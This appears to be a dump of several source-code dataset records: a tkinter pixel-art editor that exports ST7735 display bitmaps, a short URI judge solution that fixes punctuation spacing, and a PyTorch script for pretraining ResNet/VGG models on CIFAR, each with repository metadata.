'LightSteelBlue1', 'LightSteelBlue2', 'LightSteelBlue3', 'LightSteelBlue4', 'LightBlue1', 'LightBlue2',
'LightBlue3', 'LightBlue4', 'LightCyan2', 'LightCyan3', 'LightCyan4', 'PaleTurquoise1', 'PaleTurquoise2',
'PaleTurquoise3', 'PaleTurquoise4', 'CadetBlue1', 'CadetBlue2', 'CadetBlue3', 'CadetBlue4', 'turquoise1',
'turquoise2', 'turquoise3', 'turquoise4', 'cyan2', 'cyan3', 'cyan4', 'DarkSlateGray1', 'DarkSlateGray2',
'DarkSlateGray3', 'DarkSlateGray4', 'aquamarine2', 'aquamarine4', 'DarkSeaGreen1', 'DarkSeaGreen2',
'DarkSeaGreen3', 'DarkSeaGreen4', 'SeaGreen1', 'SeaGreen2', 'SeaGreen3', 'PaleGreen1', 'PaleGreen2',
'PaleGreen3', 'PaleGreen4', 'SpringGreen2', 'SpringGreen3', 'SpringGreen4', 'green2', 'green3', 'green4',
'chartreuse2', 'chartreuse3', 'chartreuse4', 'OliveDrab1', 'OliveDrab2', 'OliveDrab4', 'DarkOliveGreen1',
'DarkOliveGreen2', 'DarkOliveGreen3', 'DarkOliveGreen4', 'khaki1', 'khaki2', 'khaki3', 'khaki4',
'LightGoldenrod1', 'LightGoldenrod2', 'LightGoldenrod3', 'LightGoldenrod4', 'LightYellow2',
'LightYellow3', 'LightYellow4', 'yellow2', 'yellow3', 'yellow4', 'gold2', 'gold3', 'gold4', 'goldenrod1',
'goldenrod2', 'goldenrod3', 'goldenrod4', 'DarkGoldenrod1', 'DarkGoldenrod2', 'DarkGoldenrod3',
'DarkGoldenrod4', 'RosyBrown1', 'RosyBrown2', 'RosyBrown3', 'RosyBrown4', 'IndianRed1', 'IndianRed2',
'IndianRed3', 'IndianRed4', 'sienna1', 'sienna2', 'sienna3', 'sienna4', 'burlywood1', 'burlywood2',
'burlywood3', 'burlywood4', 'wheat1', 'wheat2', 'wheat3', 'wheat4', 'tan1', 'tan2', 'tan4', 'chocolate1',
'chocolate2', 'chocolate3', 'firebrick1', 'firebrick2', 'firebrick3', 'firebrick4', 'brown1', 'brown2',
'brown3', 'brown4', 'salmon1', 'salmon2', 'salmon3', 'salmon4', 'LightSalmon2', 'LightSalmon3',
'LightSalmon4', 'orange2', 'orange3', 'orange4', 'DarkOrange1', 'DarkOrange2', 'DarkOrange3',
'DarkOrange4', 'coral1', 'coral2', 'coral3', 'coral4', 'tomato2', 'tomato3', 'tomato4', 'OrangeRed2',
'OrangeRed3', 'OrangeRed4', 'red2', 'red3', 'red4', 'DeepPink2', 'DeepPink3', 'DeepPink4', 'HotPink1',
'HotPink2', 'HotPink3', 'HotPink4', 'pink1', 'pink2', 'pink3', 'pink4', 'LightPink1', 'LightPink2',
'LightPink3', 'LightPink4', 'PaleVioletRed1', 'PaleVioletRed2', 'PaleVioletRed3', 'PaleVioletRed4',
'maroon1', 'maroon2', 'maroon3', 'maroon4', 'VioletRed1', 'VioletRed2', 'VioletRed3', 'VioletRed4',
'magenta2', 'magenta3', 'magenta4', 'orchid1', 'orchid2', 'orchid3', 'orchid4', 'plum1', 'plum2', 'plum3',
'plum4', 'MediumOrchid1', 'MediumOrchid2', 'MediumOrchid3', 'MediumOrchid4', 'DarkOrchid1', 'DarkOrchid2',
'DarkOrchid3', 'DarkOrchid4', 'purple1', 'purple2', 'purple3', 'purple4', 'MediumPurple1',
'MediumPurple2', 'MediumPurple3', 'MediumPurple4', 'thistle1', 'thistle2', 'thistle3', 'thistle4',
'gray1', 'gray2', 'gray3', 'gray4', 'gray5', 'gray6', 'gray7', 'gray8', 'gray9', 'gray10', 'gray11',
'gray12', 'gray13', 'gray14', 'gray15', 'gray16', 'gray17', 'gray18', 'gray19', 'gray20', 'gray21',
'gray22', 'gray23', 'gray24', 'gray25', 'gray26', 'gray27', 'gray28', 'gray29', 'gray30', 'gray31',
'gray32', 'gray33', 'gray34', 'gray35', 'gray36', 'gray37', 'gray38', 'gray39', 'gray40', 'gray42',
'gray43', 'gray44', 'gray45', 'gray46', 'gray47', 'gray48', 'gray49', 'gray50', 'gray51', 'gray52',
'gray53', 'gray54', 'gray55', 'gray56', 'gray57', 'gray58', 'gray59', 'gray60', 'gray61', 'gray62',
'gray63', 'gray64', 'gray65', 'gray66', 'gray67', 'gray68', 'gray69', 'gray70', 'gray71', 'gray72',
'gray73', 'gray74', 'gray75', 'gray76', 'gray77', 'gray78', 'gray79', 'gray80', 'gray81', 'gray82',
'gray83', 'gray84', 'gray85', 'gray86', 'gray87', 'gray88', 'gray89', 'gray90', 'gray91', 'gray92',
'gray93', 'gray94', 'gray95', 'gray97', 'gray98', 'gray99']
def __init__(self, master):
self.fillbutton = "0"
menu = Menu(master)
master.config(menu=menu)
bFrame = Frame(master)
subMenu = Menu(menu, tearoff=0)
menu.add_cascade(label="File", menu=subMenu)
topPadding = Frame(master, width=self.toolbarw, height=self.toolbarh)
subMenu.add_command(label="New File", command=partial(self.importpic, bFrame, topPadding))
subMenu.add_command(label="Placeholder", command=self.doNothing)
subMenu.add_separator()
subMenu.add_command(label="Placeholder", command=self.doNothing)
editMenu = Menu(menu, tearoff=0)
menu.add_cascade(label="Edit", menu=editMenu)
editMenu.add_command(label="Remove Row", command=partial(self.removeRow, bFrame, topPadding))
editMenu.add_command(label="Remove Col", command=partial(self.removeCol, bFrame, topPadding))
viewMenu = Menu(menu, tearoff=0)
menu.add_cascade(label="View", menu=viewMenu)
viewMenu.add_command(label="Color Chart", command=self.viewColorChart)
toolbar = Frame(master, width=self.toolbarw, height=20, bg="grey")
frameSep = Frame(master, width=self.toolbarw, height=3, bg="black")
bottomPadding = Frame(master, width=self.toolbarw, height=40)
self.setfillbutton = Checkbutton(bottomPadding, text="Fill")
self.setfillbutton.config(state=DISABLED)
self.setfillbutton.pack(side=LEFT)
colorselect = Button(toolbar, text="Set Color", command=partial(self.colorfillask, bFrame, topPadding))
colorselect.pack(side=LEFT)
gridSelect = Button(toolbar, text="Grid Select", command=partial(self.changeGrid, bFrame, topPadding))
gridSelect.pack(side=LEFT)
View = Button(toolbar, text="View", command=partial(self.viewImage, 40))
View.pack(side=LEFT)
baseCol = Button(toolbar, text="Color Fill", command=partial(self.fillColor, bFrame, topPadding))
baseCol.pack(side=LEFT)
exportbut = Button(toolbar, text="Export", command=self.expFunc)
exportbut.pack(side=LEFT)
self.buttons = []
for i in range(self.griddim):
self.buttons.append(Button(bFrame, width=self.buttonw, height=self.buttonh, bg=self.basecolor,
command=partial(self.buttonColor, i, bFrame, topPadding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
self.colors.append(self.basecolor)
toolbar.pack_propagate(0)
toolbar.pack(side=TOP)
frameSep.pack(side=TOP)
topPadding.pack(side=TOP)
bFrame.pack()
bottomPadding.pack(side=BOTTOM)
def doNothing(self):
print("Nope")
def buttonColor(self, position, frame, padding):
if self.colorfillvar == 0:
colorask = Frame(padding)
label_1 = Label(colorask, text="What Color?")
entry_1 = Entry(colorask)
label_2 = Label(colorask, text="Input takes lower case standard color, \nor #xxxxxxxxx hexadecimal number ")
buttonOK = Button(colorask, text="OK",
command=partial(self.getEntry, entry_1, position, frame, colorask, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, columnspan=2)
buttonOK.grid(row=2, columnspan=2)
colorask.pack()
else:
self.buttons[position].grid_forget()
try:
temp = Button(frame, width=self.buttonw, height=self.buttonh, bg=self.fillbutton,
command=partial(self.buttonColor, position, frame, padding))
except:
self.buttons[position] = Button(frame, width=self.buttonw, height=self.buttonh, bg='red',
command=partial(self.buttonColor, position, frame, padding))
self.buttons[position].grid(row=int(position / self.gridwidth), column=int(position % self.gridwidth))
self.colors[position] = "red"
print("Color entered is not recognized by tkinter. Please format the color as either a recognized tkinter string or #RGB or #RRGGBB or #RRRGGGBBB or #RRRRGGGGBBBB")
return
self.buttons[position] = Button(frame, width=self.buttonw, height=self.buttonh, bg=self.fillbutton,
command=partial(self.buttonColor, position, frame, padding))
self.buttons[position].grid(row=int(position / self.gridwidth), column=int(position % self.gridwidth))
self.colors[position] = self.fillbutton
def getEntry(self, entry, position, frame, colorask, padding):
self.colorentry = entry.get()
padding.config(width=self.toolbarw, height=self.toolbarh)
colorask.destroy()
if self.colorfillvar == 0:
self.buttons[position].grid_forget()
try:
temp = Button(frame, width=self.buttonw, height=self.buttonh, bg=self.colorentry,
command=partial(self.buttonColor, position, frame, padding))
except:
self.buttons[position] = Button(frame, width=self.buttonw, height=self.buttonh, bg='red',
command=partial(self.buttonColor, position, frame, padding))
self.buttons[position].grid(row=int(position / self.gridwidth), column=int(position % self.gridwidth))
self.colors[position] = "red"
print("Something went wrong")
return
self.buttons[position] = Button(frame, width=self.buttonw, height=self.buttonh, bg=self.colorentry,
command=partial(self.buttonColor, position, frame, padding))
self.buttons[position].grid(row=int(position / self.gridwidth), column=int(position % self.gridwidth))
self.colors[position] = self.colorentry
else:
self.fillbutton = self.colorentry
def getButtonColor(self, button):
rgb = button.winfo_rgb(button.cget('bg'))
r = (rgb[0] >> 11)
g = (rgb[1] >> 10)
g = g << 5
b = rgb[2] >> 11
b = b << 11
rgb = b + g + r
return '0x%04x' % (rgb)
def colorfillask(self, frame, padding):
colorask = Frame(padding)
label_1 = Label(colorask, text="What Color?")
entry_1 = Entry(colorask)
label_2 = Label(colorask, text="Input takes lower case standard color, \nor #xxxxxxxxx hexadecimal number ")
container = Frame(colorask)
buttonOK = Button(container, text="OK", command=partial(self.getEntry, entry_1, 1, frame, colorask, padding))
buttonSet = Button(container, text="Set", command=self.setfillvar)
buttonClear = Button(container, text="Clear", command=self.clearfillvar)
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, columnspan=2)
buttonOK.grid(row=1, column=1)
buttonSet.grid(row=1, column=2)
buttonClear.grid(row=1, column=3)
container.grid(row=2, columnspan=2)
colorask.pack()
def setfillvar(self):
self.setfillbutton.select()
self.colorfillvar = 1
def clearfillvar(self):
self.setfillbutton.deselect()
self.colorfillvar = 0
def changeGrid(self, frame, padding):
gridask = Frame(padding)
label_1 = Label(gridask, text="Grid Width:")
entry_1 = Entry(gridask)
label_2 = Label(gridask, text="Grid Height")
entry_2 = Entry(gridask)
buttonOK = Button(gridask, text="OK",
command=partial(self.getgridEntries, entry_1, entry_2, gridask, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, column=0)
entry_2.grid(row=1, column=1)
buttonOK.grid(row=2, columnspan=2)
gridask.pack()
def getgridEntries(self, entry1, entry2, kill, frame, padding):
if entry1.get() == "":
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
if entry2 != 1:
try:
temp1 = int(entry1.get())
temp2 = int(entry2.get())
except:
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
if int(entry1.get()) >30 or int(entry2.get()) >30:
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
self.gridwidth = int(entry1.get())
self.gridheight = int(entry2.get())
else:
if entry1.get() in self.COLORS:
self.basecolor = entry1.get()
else:
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
for i in range(self.griddim):
self.buttons[i].grid_forget()
self.griddim = self.gridwidth * self.gridheight
self.colors = []
self.buttons = []
for i in range(self.griddim):
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=self.basecolor,
command=partial(self.buttonColor, i, frame, padding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
self.colors.append(self.basecolor)
frame.pack()
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
def viewImage(self, size):
pixelI = Tk()
canvas = Canvas(pixelI, width=self.gridwidth * size, height=self.gridheight * size)
canvas.pack()
for i in range(self.gridheight):
for j in range(self.gridwidth):
canvas.create_rectangle(j * size, i * size, j * size + size, i * size + size,
fill=self.colors[i * self.gridwidth + j], width=0)
def fillColor(self, frame, padding):
fillAsk = Frame(padding)
label_1 = Label(fillAsk, text="What Color?")
entry_1 = Entry(fillAsk)
label_2 = Label(fillAsk, text="Input takes lower case standard color, \nor #xxxxxxxxx hexadecimal number ")
buttonOK = Button(fillAsk, text="OK", command=partial(self.getgridEntries, entry_1, 1, fillAsk, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, columnspan=2)
buttonOK.grid(row=2, columnspan=2)
fillAsk.pack()
def expFunc(self):
print('writing file')
file = open("bitmap.txt", "w")
file.write(
"uint16_t bitmap[] = {" + ','.join([self.getButtonColor(button) for button in self.buttons]) + "};\n\n")
file.write("int idx = 0;\nfor (int i=0; i< " + str(self.gridheight) + "; i++){\n" + "\tfor (int j=0; j< " + str(
self.gridwidth) +
"; j++){\n\t\tST7735_DrawPixel(j,i,bitmap[idx]);\n\t\tidx++;\n\t}\n}")
file.close()
def importpic(self, frame, padding):
resizeask = Frame(padding)
label_1 = Label(resizeask, text="Picture Name:")
entry_1 = Entry(resizeask)
label_2 = Label(resizeask, text="Resize Width")
entry_2 = Entry(resizeask)
label_3 = Label(resizeask, text="Resize Height")
entry_3 = Entry(resizeask)
buttonOK = Button(resizeask, text="OK",
command=partial(self.resizeandplace, entry_1, entry_2, entry_3, resizeask, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, column=0)
entry_2.grid(row=1, column=1)
label_3.grid(row=2, column=0)
entry_3.grid(row=2, column=1)
buttonOK.grid(row=3, columnspan=2)
resizeask.pack()
def resizeandplace(self, entry1, entry2, entry3, kill, frame, padding):
if entry1.get() == "" or entry2.get() == "" or entry3.get() == "":
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
self.picname = entry1.get()
print(self.picname)
try:
im = Image.open(self.picname)
except:
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
for i in range(self.griddim):
self.buttons[i].grid_forget()
temp1 = self.griddim
temp2 = self.gridwidth
temp3 = self.griddim
self.gridwidth = int(entry2.get())
self.gridheight = int(entry3.get())
self.griddim = self.gridheight * self.gridwidth
im = Image.open(self.picname)
im = im.resize((self.gridwidth, self.gridheight), Image.NEAREST)
pix = im.convert('RGB')
self.colors = []
self.buttons = []
for i in range(self.griddim):
r, g, b = pix.getpixel((int(i % self.gridwidth), int(i / self.gridwidth)))
# print(int(i%self.gridheight), int(i/self.gridheight))
# print(r,g,b)
rgb = (r << 16) + (g << 8) + b
rgb = "#%0.6x" % rgb
# print(rgb)
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=rgb,
command=partial(self.buttonColor, i, frame, padding)))
if self.gridwidth < 55 or self.gridheight < 30:
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
self.colors.append(rgb)
print("Check")
if self.gridwidth > 55 or self.gridheight > 30:
print("did it work?")
self.expFunc()
self.viewImage(4)
self.griddim = temp1
self.gridwidth = temp2
self.gridheight = temp3
buttons = []
for i in range(self.griddim):
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=self.basecolor,
command=partial(self.buttonColor, i, frame, padding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
self.colors.append(self.basecolor)
frame.pack()
else:
frame.pack()
kill.destroy()
im.save('resized_image.png')
padding.config(width=self.toolbarw, height=self.toolbarh)
def viewColorChart(self):
MAX_ROWS = 36
FONT_SIZE = 10 # (pixels)
ColorChart = Tk()
ColorChart.title("Named colour chart")
row = 0
col = 0
for color in self.COLORS:
e = Label(ColorChart, text=color, background=color,
font=(None, -FONT_SIZE))
e.grid(row=row, column=col, sticky=E + W)
row += 1
if (row > 36):
row = 0
col += 1
def removeRow(self, frame, padding):
gridask = Frame(padding)
label_1 = Label(gridask, text="Row: ")
entry_1 = Entry(gridask)
buttonOK = Button(gridask, text="OK",
command=partial(self.manMatRow, entry_1, gridask, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
buttonOK.grid(row=1, columnspan=2)
gridask.pack()
def removeCol(self, frame, padding):
gridask = Frame(padding)
label_1 = Label(gridask, text="Column: ")
entry_1 = Entry(gridask)
buttonOK = Button(gridask, text="OK",
command=partial(self.manMatCol, entry_1, gridask, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
buttonOK.grid(row=1, columnspan=2)
gridask.pack()
def manMatRow(self, entry_1, gridask, frame, padding):
try:
temp1 = int(entry_1.get())
except:
print("Value given failed integer conversion")
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
if int(entry_1.get()) <=0 or int(entry_1.get()) >self.gridheight:
print("Integer given is out of bounds")
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
rowID = int(entry_1.get())-1
for i in range(self.griddim):
self.buttons[i].grid_forget()
self.buttons = []
for i in range(self.gridwidth):
del self.colors[self.gridwidth*rowID]
print(i)
self.gridheight = self.gridheight - 1
self.griddim = self.gridheight*self.gridwidth
for i in range(self.griddim):
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=self.colors[i],
command=partial(self.buttonColor, i, frame, padding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
frame.pack()
def manMatCol(self, entry_1, gridask, frame, padding):
try:
temp1 = int(entry_1.get())
except:
print("Value given failed integer conversion")
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
if int(entry_1.get()) <=0 or int(entry_1.get()) >self.gridwidth:
print("Integer given is out of bounds")
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
colID = int(entry_1.get())-1
for i in range(self.griddim):
self.buttons[i].grid_forget()
self.buttons = []
temp = []
j=0
for i in range(self.griddim):
if (i%self.gridwidth == colID):
continue
else:
temp.append(self.colors[i])
j=j+1
self.colors = temp
self.gridwidth = self.gridwidth - 1
self.griddim = self.gridheight*self.gridwidth
for i in range(self.griddim):
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=self.colors[i],
command=partial(self.buttonColor, i, frame, padding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
frame.pack()
root = Tk()
z = mainclass(root)
root.mainloop()
sys.exit()
| 18,808
| 8,280
| 24
|
5b5b793fca0e9766cab8b5858b8f208bb7985336
| 99
|
py
|
Python
|
3088.py
|
heltonricardo/URI
|
160cca22d94aa667177c9ebf2a1c9864c5e55b41
|
[
"MIT"
] | 6
|
2021-04-13T00:33:43.000Z
|
2022-02-10T10:23:59.000Z
|
3088.py
|
heltonricardo/URI
|
160cca22d94aa667177c9ebf2a1c9864c5e55b41
|
[
"MIT"
] | null | null | null |
3088.py
|
heltonricardo/URI
|
160cca22d94aa667177c9ebf2a1c9864c5e55b41
|
[
"MIT"
] | 3
|
2021-03-23T18:42:24.000Z
|
2022-02-10T10:24:07.000Z
|
while True:
try: e = input()
except: break
print(e.replace(' .', '.').replace(' ,', ','))
| 19.8
| 49
| 0.494949
|
while True:
try: e = input()
except: break
print(e.replace(' .', '.').replace(' ,', ','))
| 0
| 0
| 0
|
ab980aaa6de7f8762e60114a8a45d13eb831478f
| 5,985
|
py
|
Python
|
Unlearning/pretrain.py
|
cleverhans-lab/unrolling-sgd
|
49e001f9cc77b61d65eac3bf26888b5183b73bef
|
[
"MIT"
] | 3
|
2022-03-21T13:16:56.000Z
|
2022-03-22T07:55:10.000Z
|
Unlearning/pretrain.py
|
cleverhans-lab/unrolling-sgd
|
49e001f9cc77b61d65eac3bf26888b5183b73bef
|
[
"MIT"
] | null | null | null |
Unlearning/pretrain.py
|
cleverhans-lab/unrolling-sgd
|
49e001f9cc77b61d65eac3bf26888b5183b73bef
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
from ResNet_CIFAR10 import *
from VGG_model import *
#####################################################################
################### Some Loss functions things ######################
#####################################################################
parser = argparse.ArgumentParser(description='Pre-training CIFAR10 Models')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--model', default='resnet', type=str, help='resnet or vgg')
parser.add_argument('--loss_func', default='regular', type=str, help='loss function: regular,hessian, hessianv2, std_loss')
parser.add_argument('--dataset', default = 'cifar10', type=str, help ='cifar10, cifar100')
parser.add_argument('--batch_size', default=128, type=int, help='batch size')
parser.add_argument('--epochs', default=10, type=int, help='epochs')
parser.add_argument('--std_reg', default = 0.1, type = float, help= 'regularization for std loss')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
std_reg = args.std_reg
print(f'Model = {args.model} dataset = {args.dataset} loss = {args.loss_func} std lambda = {args.std_reg}')
print('==> Preparing data..')
if args.dataset == 'cifar10':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)
num_classes = 10
if args.dataset == 'cifar100':
transform_train = transforms.Compose([
#transforms.ToPILImage(),
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(15),
transforms.ToTensor(),
transforms.Normalize( (0.5070751592371323, 0.48654887331495095, 0.4409178433670343), (0.2673342858792401, 0.2564384629170883, 0.27615047132568404))
])
#cifar100_training = CIFAR100Train(path, transform=transform_train)
cifar100_training = torchvision.datasets.CIFAR100(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(cifar100_training, shuffle=True, num_workers=2, batch_size=args.batch_size)
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5070751592371323, 0.48654887331495095, 0.4409178433670343), (0.2673342858792401, 0.2564384629170883, 0.27615047132568404))])
cifar100_test = torchvision.datasets.CIFAR100(root='./data', train=False, download=True, transform=transform_test)
testloader= torch.utils.data.DataLoader(cifar100_test, shuffle=True, num_workers=2, batch_size=args.batch_size)
num_classes = 100
print('==> Building model..')
if args.model == 'resnet':
net = ResNet18(num_classes)
if args.model == 'vgg':
net = VGG('VGG19',num_classes)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr, weight_decay=5e-4)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=200)
for epoch in range(0, args.epochs):
train(epoch)
scheduler.step()
test(epoch)
acc =test(0)
print('Saving..')
state = {
'net': net.state_dict(),
'acc': acc,
'epoch': args.epochs,
'batch size': args.batch_size,
}
if not os.path.isdir('Final_pretrained_models'):
os.mkdir('Final_pretrained_models')
torch.save(state, f'./Final_pretrained_models/{args.model}_{args.dataset}_{args.loss_func}_{args.batch_size}_{args.epochs}.pth')
| 40.167785
| 156
| 0.661988
|
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
from ResNet_CIFAR10 import *
from VGG_model import *
#####################################################################
################### Some Loss functions things ######################
#####################################################################
def std_loss(x,y):
log_prob = -1.0 * F.log_softmax(x, 1)
loss = log_prob.gather(1, y.unsqueeze(1))
loss = loss.mean()
avg_std = torch.sum(torch.std(x, dim=1))/(len(x.view(-1)))
loss = loss + std_reg*avg_std
return loss
parser = argparse.ArgumentParser(description='Pre-training CIFAR10 Models')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--model', default='resnet', type=str, help='resnet or vgg')
parser.add_argument('--loss_func', default='regular', type=str, help='loss function: regular,hessian, hessianv2, std_loss')
parser.add_argument('--dataset', default = 'cifar10', type=str, help ='cifar10, cifar100')
parser.add_argument('--batch_size', default=128, type=int, help='batch size')
parser.add_argument('--epochs', default=10, type=int, help='epochs')
parser.add_argument('--std_reg', default = 0.1, type = float, help= 'regularization for std loss')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
std_reg = args.std_reg
print(f'Model = {args.model} dataset = {args.dataset} loss = {args.loss_func} std lambda = {args.std_reg}')
print('==> Preparing data..')
if args.dataset == 'cifar10':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)
num_classes = 10
if args.dataset == 'cifar100':
transform_train = transforms.Compose([
#transforms.ToPILImage(),
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(15),
transforms.ToTensor(),
transforms.Normalize( (0.5070751592371323, 0.48654887331495095, 0.4409178433670343), (0.2673342858792401, 0.2564384629170883, 0.27615047132568404))
])
#cifar100_training = CIFAR100Train(path, transform=transform_train)
cifar100_training = torchvision.datasets.CIFAR100(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(cifar100_training, shuffle=True, num_workers=2, batch_size=args.batch_size)
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5070751592371323, 0.48654887331495095, 0.4409178433670343), (0.2673342858792401, 0.2564384629170883, 0.27615047132568404))])
cifar100_test = torchvision.datasets.CIFAR100(root='./data', train=False, download=True, transform=transform_test)
testloader= torch.utils.data.DataLoader(cifar100_test, shuffle=True, num_workers=2, batch_size=args.batch_size)
num_classes = 100
print('==> Building model..')
if args.model == 'resnet':
net = ResNet18(num_classes)
if args.model == 'vgg':
net = VGG('VGG19',num_classes)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr, weight_decay=5e-4)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=200)
def train(epoch):
print('Epoch: %d' % epoch)
net.train()
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
outputs = net(inputs)
if args.loss_func == 'std':
loss = std_loss(outputs,targets)
if args.loss_func =='regular':
loss = criterion(outputs,targets)
loss.backward()
optimizer.step()
def test(epoch):
    """Evaluate ``net`` on ``testloader`` and return the accuracy in percent.

    Args:
        epoch (int): current epoch number (unused; kept for interface symmetry
            with ``train``).

    Returns:
        float: classification accuracy over the test set, 0-100.

    Raises:
        ValueError: if ``args.loss_func`` is not 'std' or 'regular'.
            (Previously an unrecognized value crashed with an
            UnboundLocalError on ``loss`` instead.)
    """
    net.eval()
    test_loss = 0  # accumulated but only accuracy is reported/returned
    correct = 0
    total = 0
    with torch.no_grad():
        for batch_idx, (inputs, targets) in enumerate(testloader):
            inputs, targets = inputs.to(device), targets.to(device)
            outputs = net(inputs)
            if args.loss_func == 'std':
                loss = std_loss(outputs, targets)
            elif args.loss_func == 'regular':
                loss = criterion(outputs, targets)
            else:
                raise ValueError(f"unknown loss_func: {args.loss_func!r}")
            test_loss += loss.item()
            _, predicted = outputs.max(1)
            total += targets.size(0)
            correct += predicted.eq(targets).sum().item()
    print('testing Accuracy: %.3f%% (%d/%d)' %(100.*correct/total, correct, total))
    acc = 100.*correct/total
    return acc
# Train for the configured number of epochs, stepping the LR scheduler and
# evaluating after every epoch.
for epoch in range(0, args.epochs):
    train(epoch)
    scheduler.step()
    test(epoch)
# NOTE(review): the final epoch was already evaluated inside the loop above;
# this extra call re-runs the whole test set just to capture `acc`.
acc =test(0)
print('Saving..')
# Checkpoint payload: weights plus the run configuration that produced them.
state = {
    'net': net.state_dict(),
    'acc': acc,
    'epoch': args.epochs,
    'batch size': args.batch_size,
}
if not os.path.isdir('Final_pretrained_models'):
    os.mkdir('Final_pretrained_models')
# File name encodes model/dataset/loss/batch-size/epochs for later lookup.
torch.save(state, f'./Final_pretrained_models/{args.model}_{args.dataset}_{args.loss_func}_{args.batch_size}_{args.epochs}.pth')
| 1,412
| 0
| 68
|
3687dfbc45547dd943f334c95d56f3afef1bae2d
| 8,256
|
py
|
Python
|
pgsqltoolsservice/workspace/workspace_service.py
|
sergb213/pgtoolsservice
|
6296a207e7443fe4ebd5c91d837c033ee7886cab
|
[
"MIT"
] | null | null | null |
pgsqltoolsservice/workspace/workspace_service.py
|
sergb213/pgtoolsservice
|
6296a207e7443fe4ebd5c91d837c033ee7886cab
|
[
"MIT"
] | null | null | null |
